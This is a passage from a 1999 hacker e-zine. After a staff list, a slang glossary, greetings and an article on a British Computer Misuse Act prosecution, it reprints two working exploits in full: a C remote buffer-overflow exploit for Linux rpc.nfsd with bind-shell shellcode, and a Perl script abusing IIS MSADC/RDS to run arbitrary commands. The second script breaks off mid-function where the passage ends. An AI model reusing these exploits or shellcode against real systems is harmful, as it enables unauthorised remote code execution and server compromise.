non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhores and #403-sec Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * This is our Birthday issue! we're ONE as of Nov 13th'99 * * So dig in to our first anniversary issue and enjoy... * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start =- ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| _ _ ___| |_ __ _ _ __| |_ / __| __/ _` | '__| __| \__ \ || (_| | | | |_ |___/\__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= start =- 03.0 Who is Chris Buckley and why was he busted? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The name Chris Buckley is well known in the British H/P newsgroups but he has nothing to do with HP, He's just an internet ng junkie. He posted up to 40 emails a day and took it upon himself to act as BT's "help" guide on one particular newsgroup hurling insults and the like at hapless newbies that were actually looking for tech support and help. BT it seems didn't take too kindly to this action and decided to have his account pulled, in the process of tracking down his account it was discovered that he was indeed using 'borrowed' accounts and a 800 number to access the net that he had no right to be using, hence his downfall and a visit by BT security and the local Police. Durzell picks up on the story .... - Ed From http://www.barrysworld.com/news/columns.asp?Author=6&Category=6 Contributed by Abattis When anonymity is no defence Sunday, November 14, 1999, 03:44 The Internet as it stands today is an almost unimaginable concept. If someone were to come up to me in the street (assuming of course that I`d never heard of the `Net) and said I could speak to anyone in the World, `go` anywhere I liked, do pretty much whatever I wanted from the relative sanctity and seclusion of my bedroom, I`d never have believed them. The fact that this supposed unreal concept is an everyday reality to myself and millions of others is a testament to how far technology has taken us in the past few years. The inherent problem however with the `Net in its existing incarnation is that for many of us it takes on a form that is quite different from everyday life. Because we are so isolated and protected from this mythical World out there, a fundamental sociological safeguard is missing. Whereas many of us know the divide in everyday life between right and wrong, lawful and unlawful acts - these same principals are often jaded or even non-existant on the Internet. Out there the perception among the masses is that the likes of warez`ing (i.e. to download commercial material) software is `the done thing`, it`s not really stealing, noone gets hurt. Likewise insulting others openly isn`t `real`, it`s only text after all - it`s not the same as RealLifeTM really. However hardened one`s resolve is against abusing others, illegally downloading software and other such activities is all too easy to slip into, after all noone can doubt that it`s far easier for many people to hide behind a screen and email your thoughts and opinions freely without consequence than it is to attempt to make the same observations in person, especially if they have a controversial nature. Most of us are fortunate to be able to look upon our Internet existences to date retrospectively, to see where perhaps we made errors of judgements or indeed partook in acts that at the time seemed to be `part of the `Net experience`, that are in actual fact illegal, costly and damaging to individuals and/or companies whom they affect. For a minority however this luxury is not available to them, people who realised too late the respective `errors in their ways`.. One such individual is Chris Buckley. Chris Buckley is somewhat unique in the Internet online community, being someone who is both unknown to a faction of the community, yet synonymous to the rest. His notoriety stems mainly from activities on Usenet (Internet newsgroups) together, more recently, with his usage of several highly publicised BT 0800 staff/engineer numbers. What differentiates Mr Buckley from the thousands of others that had been using these open staff/engineer numbers however is that for reasons best known to themselves, British Telecom are proactively seeking prosecution of this one individual, on charges relating solely to acts he (allegedly) perpetrated on the Internet. These charges are as follows: 1) At (town name) in the county of (county) on 5th July 1999 knowingly caused a computer to perform a function with intent to obtain unauthorised access to the computers running BT Internet. Contrary to Section 1 of the Computer Misuse Act 1990 2) At (town name) in the county of (county) on and between 1st and 7th July 1999 sent by means of a public telecommunication system in excess of 100 e-data messages for the purpose of causing annoyance. Contrary to Section 42 of the Telecommunications Act 1984 3) At (town name) in the county of (county) on 5th July 1999 made a telephone call for 9 hours 46 minutes and 58 seconds using a public telecommunications system with the intention of avoiding payment for the call. Contrary to Section 42 of the Telecommunications Act 1984 As Chris Buckley has rightly stated in correspondance following the announcement of the charges, this is by no means a token case - it is in effect a landmark action by the telecommunications bohemeth which, if successful, could lead to charges being brought against hundreds maybe even thousands of other `Net users that have used this BT 0800 staff/engineer number illegally. Of course the issue of whether or not the trial is eventually successful is not the focal point of this entire issue, moreof the fact that this case marks perhaps the first ever where a UK company has taken on an individual based solely on activities that in many people`s eyes would deem to be trivial or circumstantial. After all, who is to say what is classified as `annoying` e-mail? Can an individual be expected to pay for a freephone (0800) number that allows him/her to connect on a regular ISP account? All these questions will be answered in the trial of Chris Buckley, and I for one will be awaiting the final outcome with trepidation, as it could effectively spell the end of the Internet as many of us know it. @HWA 04.0 rpc.nfsd2 exploit for Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /* * rpc.nfsd2 exploit for Linux * * today is 4/07/99 (3 months after 1st version;) * * changes in v.2: * That version can be used for FULL remote exploiting, I changed/added * two important things: * - new shellcode: sh on defined port * - creating dirs via ftp * Now you can hack box remotely if you have +w via ftp. * (./3nfsd2 -e /home/ftp/incoming -f /incoming) | nc target 21 * * author: tmoggie * greetz: * DiGiT - bug * maxiu - help with shellcode * lam3rZ GrP - :) * */ #include #include #include #include #include #include #define green "\E[32m" #define bold "\E[1m" #define normal "\E[m" #define red "\E[31m" char shell[255] = "\xeb\x70\x31\xc9\x31\xdb\x31\xc0\xb0\x46\xcd\x80\x5e\x83\xc6\x0f\x89\x46" "\x10\x89\x46\x14\x89\x46\x18\xb0\x02\x89\x06\x89\x46\x0c\xb0\x06\x89\x46" "\x08\x31\xc0\xfe\xc3\x89\x5e\x04\xb0\x66\x89\xf1\xcd\x80\x89\x06\xb0\x30" "\x31\xdb\x31\xc9\xb3\x0e\xfe\xc1\xcd\x80\x66\xb8\x69\x7a\x86\xc4\x66\x89" "\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\xb0\x10\x89\x46\x08\xb0\x66\x31" "\xdb\xb3\x02\x89\xf1\xcd\x80\x31\xc0\xfe\xc0\x89\x46\x04\xb0\x66\xb3\x04" "\x89\xf1\xcd\x80\xeb\x04\xeb\x60\xeb\x8c\x89\x46\x0c\x8d\x46\x0c\x89\x46" "\x04\x89\x46\x08\xc6\x46\x0c\x10\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x89\xf1" "\xcd\x80\x83\xee\x0f\x89\xc3\x31\xc9\x89\x4e\x14\xb0\x3f\xcd\x80\x41\xb0" "\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\xfe\x06\xfe\x46\x04\x88\x66\x07\x88\x66" "\x0b\x89\x76\x0c\x8d\x46\x09\x89\x46\x10\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e" "\x0c\x8d\x56\x10\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80\xe8\x9b\xff\xff"; char next[] = "\xff\x2e\x62\x69\x6e\x2e\x73\x68\x41\x41\x2d\x69"; char mark[] = "\xff\xff\xff"; int port = 31337; int offset; void usage(char *prog) { printf("\nusage: %s <-e dir> [-t target] [-s port] " "[-f dir] [-u user] [-p pass]\n\n",prog); printf(" -e dir : real-path to exported direectory\n"); printf(" -t target : target OS\n "); printf(" 1 - RH 5.2 (default) \n" " 2 - Debian 2.1\n"); printf(" -s port : shell port, default is 31337\n"); printf(" -f dir : ftp-path to exported directory\n"); printf(" -u : ftp username (default is ftp)\n"); printf(" -p : ftp password (default is ftp@ftp.org\n\n"); exit(0); } void main(int argc, char **argv) { int i,j; int ftp=0; char user[255]="ftp"; char pass[255]="ftp@ftp.org"; char buf[4096]; char buf2[4096]; char tmp[4096]; char tmp2[4096]; char exp[255] = "!"; char exp2[255]= "!"; char addr[] = "\x06\xf6\xff\xff\xbf"; while (1) { i = getopt(argc,argv,"t:e:s:f:u:p:"); if (i == -1) break; switch (i) { case 'e': strcpy(exp,optarg); break; case 's': port = optarg; break; case 'f': strcpy(exp2,optarg); ftp = 1; break; case 'u': strcpy(user,optarg); break; case 'p': strcpy(pass,optarg); break; case 't': switch (j=atoi(optarg)) { case 1: strcpy(addr,"\x06\xf6\xff\xff\xbf"); break; // debian 1.2 case 2: strcpy(addr,"\x18\xf6\xff\xff\xbf"); break; // rh 5.2 } default : usage(argv[0]); break; } } if (!strcmp(exp,"!")) usage(argv[0]); if (ftp == 1) { // sockets, resolve, connect...... } *((unsigned short *) (shell + 66)) = port; offset = strlen(exp); if (exp[offset-1] != '/') strcat(exp,"/"); offset = strlen(exp); // 1st directory bzero(buf,sizeof(buf)); memset(tmp,'A',255); tmp[255]='/'; tmp[256]='\0'; strncpy(buf,exp,offset); // make our dirs if (ftp == 1) { printf("USER %s\n",user); printf("PASS %s\n",pass); printf("CWD %s\n",exp2); } for (i=1;i<=3;i++) { strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck! can't create directory!!! : %d\n%s\n"normal,i,buf); exit(-1); } } else { tmp[255]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } } // offset direcory, length depends on real-path memset(tmp,'A',255); tmp[255-offset]='/'; tmp[256-offset]='\0'; strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal); exit(-1); } } else { tmp[255-offset]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } // shell directory memset(tmp,'x',255); // printf("%d\n", strlen(shell)); if (ftp == 1) strncat(shell,mark,strlen(mark)); // printf("%d\n", strlen(shell)); strncat(shell,next,strlen(next)); if (ftp == 1) i=3; else i=0; strcpy(tmp+(255+i-strlen(shell)),shell); // printf("%d\n", strlen(shell)); strncat(buf,tmp,strlen(tmp)); strncat(buf,"/",strlen("/")); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck!@# shell-dir\n%s\n"normal, buf); exit(-1); } } else { tmp[258]='\0'; printf("MKD %s\n",tmp); printf("CWD %s\n",tmp); } // addr direcotry memset(tmp,'a',255); tmp[97] = '\0'; // *((int*)(tmp+93)) = addr; // if (ftp != 1) *((int*)(tmp+93)) = 0xbffff606; // debian 2.1 // else { strcpy(tmp+93,addr); // } strncat(buf,tmp,strlen(tmp)); if (ftp != 1) { if (mkdir(buf,0777) < 0) { printf(red"...fuck!@#!@#!$ addrez-dir ^\n%s\n"normal, buf); exit(-1); } } else { printf("MKD %s\n",tmp); printf("quit\n",tmp); } fprintf(stderr,normal green"Ok\n"normal); fprintf(stderr,"now you have to do: "bold green \ "rm -rf /path-to-mount-point/A[tab] & \n" "and: telnet target %d\n\n"normal,port); } @HWA 05.0 MSADC/RDS script v2 by rain forest puppy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ #!/usr/bin/perl # # MSADC/RDS 'usage' (aka exploit) script version 2 # # by rain forest puppy # # - added UNC support, really didn't clean up code, but oh well use Socket; use Getopt::Std; getopts("e:vd:h:XRVNwcu:s:", \%args); print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\\\host\\share\\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session ~; exit;} ########################################################### # config data @drives=("c","d","e","f","g","h"); @sysdirs=("winnt","winnt35","winnt351","win","windows"); # we want 'wicca' first, because if step 2 made the DSN, it's ready to go @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); # this is sparse, because I don't know of many @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\ias\\ias.mdb", "\\system32\\ias\\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ ########################################################### $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X}) { &hork_idx; exit; } if (defined $args{N}) { &get_name; exit; } if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} if (defined $args{R}) { &load; exit; } print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; if (!defined $args{s} || $args{s}==1){ print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr;} if (!defined $args{s} || $args{s}==2){ print "\nStep 2: Trying to make our own DSN..."; if (&make_dsn){ print "<>\n"; sleep(3); } else { print "<>\n"; }} # we need to sleep to let the server catchup if (!defined $args{s} || $args{s}==3){ print "\nStep 3: Trying known DSNs..."; &known_dsn;} if (!defined $args{s} || $args{s}==4){ print "\nStep 4: Trying known .mdbs..."; &known_mdb;} if (!defined $args{s} || $args{s}==5){ if (defined $args{u}){ print "\xStep 5: Trying UNC..."; &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }} if (!defined $args{s} || $args{s}==6){ if (defined $args{e}){ print "\nStep 6: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }} print "\n\nNo luck, guess you'll have to use a real hack, eh?\n"; exit; ############################################################################## sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT "." if(defined $args{X});} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $aa, $bb; if (defined $args{V}){ $aa="VbBusObj.VbBusObjCls.GetRecordset"; $bb="2"; } else { $aa="AdvancedDataFactory.Query"; $bb="3";} $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { foreach $dir (@sysdirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n"; save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1)=@_; my $ropt=""; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; if (defined $args{c}){ $ropt="c ";} if (defined $args{V}){ $ropt.="V ";} if (defined $args{w}){ $ropt.="w ";} print OUT "v2\n$ip\n$ropt\n$p1\n"; close OUT;} ############################################################################## sub load { my ($action)=@_; my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; open(IN,"; close(IN); die("Wrong rds.save version") if $p[0] ne "v2\n"; $ip="$p[1]"; $ip=~s/\n//g; $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; @switches=split(/ /,$p[2]); foreach $switch (@switches) { $args{$switch}="1";} if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} print "Type the command line you want to run ($comm assumed):\n" . "$comm "; $in=; chomp $in; $command="$comm " . $in ; $torun="$p[3]"; $torun=~s/\n//g; if($torun=~/btcustmr/){ $args{'c'}="1";} # this is a kludge to make it work if($torun=~/^dbq/){ $torun=$drvst.$torun; } if(run_query("$torun")){ print "Success!\n";} else { print "failed\n"; } exit;} ############################################################################## sub create_table { return 1 if (!defined $args{c}); return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (!defined $args{c}); return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; my $req; if (defined $args{c}){$req=3;} else {$req=6;} $reqlen=length( make_req($req,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req($req,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; foreach $drive (@drives) { foreach $dir (@sysdirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv.$drive.":\\".$dir.$mdb)){ if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv.$drive.":".$mdb)){ if(run_query($drv.$drive.":".$mdb)){ print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n"; close(IN);} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { # assume there's less than 500 headers if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); 